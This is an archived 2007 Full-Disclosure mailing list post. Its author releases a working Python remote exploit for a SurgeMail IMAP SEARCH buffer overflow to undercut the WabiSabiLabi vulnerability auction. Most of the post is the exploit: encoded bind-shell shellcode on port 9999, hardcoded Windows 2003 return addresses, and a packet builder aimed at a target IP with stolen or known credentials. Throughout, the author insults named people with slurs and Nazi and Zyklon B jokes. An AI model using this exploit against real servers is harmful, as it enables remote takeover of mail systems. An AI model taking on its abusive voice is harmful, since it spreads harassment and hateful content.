lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <20070813211935.16850DA81F@mailserver7.hushmail.com>
Date: Mon, 13 Aug 2007 17:19:32 -0400
From: "Joey Mengele" <joey.mengele@...hmail.com>
To: <full-disclosure@...ts.grok.org.uk>,<bugtraq@...urityfocus.com>
Subject: Stop WabiSabiLabi Hacker Oppression NOW

Dear Lenny Rose and Friends,

!STOP THE MODERATION LENNY! INFORMATION WANTS TO BE FREE!
!STOP THE MODERATION LENNY! INFORMATION WANTS TO BE FREE!
!STOP THE MODERATION LENNY! INFORMATION WANTS TO BE FREE!

Attached and inline please find an exploit for the Surgemail 38k 
0day vulnerability being sold for auction by WabiSabiLabi. [1]

I find it humorous that someone might have received money for even 
a reliable exploit for this bug. This exploit was hacked together 
in an afternoon and will likely only work on Windows 2K3. As most 
bugs with WabiSabiLabi, this shitty IMAP vulnerability requires 
credentials for exploitation. To anyone who intended to bid on this 
item: stop!

I am calling on all of those capable to help destroy this 
WabiSabiLabi nonsense. There are only PHP bugs left on the auction 
block for now, so maybe Stefan Esser, the Brad Spengler [2] of web 
programming languages, can step up here and kill some bugs for a 
GOOD cause for once in his life. End hacker oppression, destroy 
WabiSabiLabi!

To anyone who is dumb enough to sell bugs through WabiSabiLabi: you 
are dumb LOLOLOLOL!

For those of you who missed the previous WabiSabiLabi item that was 
exposed, famous male scenewhore str0ke was kind enough to mirror 
the exploit on his Internet homepage, milw0rm. [4]

J

[1] http://www.wslabi.com/wabisabilabi/initPublishedBid.do
[2] Brad Spengler is an arrogant prick. [3]
[3] http://m00.blackhat.ru/misc/spender-lol.log
[4] http://milw0rm.com/exploits/4222

__ BEGIN HACKING PROGRAM __

#!/usr/bin/python

import os
import sys
import time
import socket
import struct

#this is imap exploit

#710 bytes, tcp port 9999 bind, borrowed from skape miller inventor 
of megacanvas
sc  = "\x90"
sc += 
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xeb\x03\x59"
sc += 
"\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49\x49\x49\x49"
sc += 
"\x49\x49\x49\x49\x49\x49\x49\x49\x51\x37\x5a\x6a\x66\x58\x50\x30"
sc += 
"\x41\x31\x42\x41\x6b\x41\x41\x76\x41\x32\x41\x41\x32\x42\x41\x30"
sc += 
"\x42\x41\x58\x50\x38\x41\x42\x75\x79\x79\x4b\x4c\x32\x4a\x7a\x4b"
sc += 
"\x42\x6d\x78\x68\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f\x75\x30\x6e\x6b"
sc += 
"\x42\x4c\x45\x74\x71\x34\x6c\x4b\x41\x55\x57\x4c\x4e\x6b\x33\x4c"
sc += 
"\x53\x35\x51\x68\x55\x51\x68\x6f\x4c\x4b\x72\x6f\x56\x78\x6e\x6b"
sc += 
"\x61\x4f\x77\x50\x76\x61\x38\x6b\x52\x69\x4e\x6b\x36\x54\x4e\x6b"
sc += 
"\x67\x71\x4a\x4e\x76\x51\x4f\x30\x6d\x49\x4e\x4c\x4d\x54\x4b\x70"
sc += 
"\x41\x64\x43\x37\x4b\x71\x6b\x7a\x76\x6d\x54\x41\x4f\x32\x7a\x4b"
sc += 
"\x6a\x54\x45\x6b\x33\x64\x56\x44\x77\x58\x34\x35\x6b\x55\x4c\x4b"
sc += 
"\x61\x4f\x46\x44\x55\x51\x58\x6b\x31\x76\x6c\x4b\x46\x6c\x30\x4b"
sc += 
"\x4e\x6b\x61\x4f\x75\x4c\x64\x41\x38\x6b\x53\x33\x54\x6c\x4c\x4b"
sc += 
"\x6d\x59\x50\x6c\x64\x64\x55\x4c\x30\x61\x6b\x73\x74\x71\x4b\x6b"
sc += 
"\x51\x74\x4c\x4b\x51\x53\x70\x30\x4c\x4b\x77\x30\x36\x6c\x4c\x4b"
sc += 
"\x72\x50\x35\x4c\x4e\x4d\x6c\x4b\x73\x70\x57\x78\x31\x4e\x42\x48"
sc += 
"\x4e\x6e\x50\x4e\x76\x6e\x5a\x4c\x30\x50\x6b\x4f\x49\x46\x75\x36"
sc += 
"\x56\x33\x53\x56\x75\x38\x37\x43\x34\x72\x35\x38\x74\x37\x54\x33"
sc += 
"\x44\x72\x63\x6f\x71\x44\x4b\x4f\x7a\x70\x42\x48\x38\x4b\x38\x6d"
sc += 
"\x6b\x4c\x47\x4b\x30\x50\x4b\x4f\x4e\x36\x51\x4f\x4f\x79\x4d\x35"
sc += 
"\x42\x46\x4b\x31\x7a\x4d\x33\x38\x57\x72\x76\x35\x61\x7a\x46\x62"
sc += 
"\x4b\x4f\x6e\x30\x51\x78\x4b\x69\x67\x79\x59\x65\x6c\x6d\x41\x47"
sc += 
"\x4b\x4f\x6e\x36\x41\x43\x56\x33\x76\x33\x52\x73\x70\x53\x51\x53"
sc += 
"\x70\x53\x32\x63\x32\x73\x6b\x4f\x4e\x30\x41\x76\x62\x48\x36\x47"
sc += 
"\x54\x4f\x41\x76\x72\x73\x4f\x79\x49\x71\x4e\x75\x31\x78\x6e\x44"
sc += 
"\x67\x6a\x64\x30\x4f\x37\x70\x57\x69\x6f\x6e\x36\x70\x6a\x74\x50"
sc += 
"\x62\x71\x73\x65\x4b\x4f\x38\x50\x62\x48\x4c\x64\x4e\x4d\x64\x6e"
sc += 
"\x58\x69\x62\x77\x4b\x4f\x7a\x76\x50\x53\x51\x45\x39\x6f\x58\x50"
sc += 
"\x71\x78\x6b\x55\x53\x79\x6f\x76\x53\x79\x36\x37\x39\x6f\x79\x46"
sc += 
"\x72\x70\x61\x44\x33\x64\x62\x75\x59\x6f\x48\x50\x4a\x33\x51\x78"
sc += 
"\x6d\x37\x71\x69\x79\x56\x71\x69\x70\x57\x6b\x4f\x6e\x36\x51\x45"
sc += 
"\x69\x6f\x6e\x30\x45\x36\x63\x5a\x41\x74\x35\x36\x72\x48\x30\x63"
sc += 
"\x50\x6d\x6f\x79\x59\x75\x63\x5a\x52\x70\x43\x69\x37\x59\x58\x4c"
sc += 
"\x4f\x79\x79\x77\x52\x4a\x33\x74\x4d\x59\x39\x72\x55\x61\x4f\x30"
sc += 
"\x7a\x53\x6d\x7a\x79\x6e\x47\x32\x76\x4d\x69\x6e\x47\x32\x34\x6c"
sc += 
"\x6d\x43\x6c\x4d\x72\x5a\x54\x78\x4e\x4b\x4c\x6b\x6c\x6b\x75\x38"
sc += 
"\x52\x52\x4b\x4e\x4e\x53\x55\x46\x79\x6f\x71\x65\x41\x54\x59\x6f"
sc += 
"\x4e\x36\x43\x6b\x71\x47\x51\x42\x52\x71\x62\x71\x52\x71\x51\x7a"
sc += 
"\x33\x31\x56\x31\x46\x31\x51\x45\x50\x51\x59\x6f\x4e\x30\x50\x68"
sc += 
"\x4c\x6d\x6e\x39\x53\x35\x6a\x6e\x62\x73\x49\x6f\x5a\x76\x50\x6a"
sc += 
"\x59\x6f\x4b\x4f\x34\x77\x59\x6f\x5a\x70\x6c\x4b\x32\x77\x39\x6c"
sc += 
"\x6c\x43\x4b\x74\x61\x74\x6b\x4f\x6a\x76\x50\x52\x79\x6f\x6e\x30"
sc += 
"\x42\x48\x7a\x4f\x6a\x6e\x59\x70\x63\x50\x42\x73\x4b\x4f\x48\x56"
sc += "\x79\x6f\x4e\x30\x66"


def Copulate(target,port):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target,port))
        return s

def Fascism(target,u,p):
        safe_readable_null = 0x71c010e4 # Safe readable, preferably 
null (ws2_32 on win2k3)
        safe_writable = 0x0fff7004 # Safe writable (rsaenh.dll data 
section on win2k3)
        pop_then_ret = 0x77e41a26 # EIP (pop, ret in kernel32 on 
win2k3)
        call_esp = 0x77e839b3 # Return #2, call esp in kernel32. 
When hit, esp points at the next 4 bytes.
        s = Copulate(target,143)
        pkt = "0001 LOGIN \""
        pkt += u
        pkt += "\" \""
        pkt += p
        pkt += "\"\r\n"
        SendPacket(s,pkt)
        pkt = "0003 SELECT \"Inbox\"\r\n"
        SendPacket(s,pkt)
        pkt = "C284 SEARCH "
        pkt += "P"*1008
        pkt += struct.pack('<L',safe_readable_null)
        pkt += "CUNT" # Word used to describe members of the 
infosec community.
        pkt += struct.pack('<L',pop_then_ret)
        pkt += struct.pack('<L',safe_writable)
        pkt += struct.pack('<L',call_esp)
        pkt += "A"*198 # I have boned over 198 bitches
        pkt += "\xeb\x10" # Body Mass Index of Gadi Evron, 
hexadecimal LOLOLOLOL
        pkt += struct.pack('<L',safe_readable_null)
        pkt += "A"*16 # Unnecessary megathropic nopsled, invented 
by k2, founding member of n3td3v
        pkt += sc
        pkt += " (SAVE MIN) SINCE 12-Feb-1992 NOT FROM \"Len Rose 
The Moderating Nazi of Full Disclosure, Original Founder of Zyklon 
B\"\r\n"
        print "Sending. Hold on."
        SendPacket(s,pkt)
        time.sleep(3)
        print "The service will continue functioning but cannot be 
exploited again until restart."
        print "Please telnet to port 9999 on it now for a 
rootshell."
        print "         -management"
        s.close()

def SendPacket(s,pkt):
        s.send(pkt) # comment

if __name__ == '__main__':
        try:
                target = sys.argv[1]
                u = sys.argv[2]
                p = sys.argv[3]
        except IndexError:
                print 'Usage: %s <ip address> <user> <pass>' % 
sys.argv[0]
                sys.exit(-1)
        Fascism(target,u,p)

--
Click for free information on accounting careers, $150/hour potential.
http://tagline.hushmail.com/fc/Ioyw6h4dCeQhJTFTg28sH8XxHbARovnjMaM8FeFwtiew6tjcPaO7he/


Download attachment "SURGEMAIL.py" of type "application/octet-stream" (5359 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ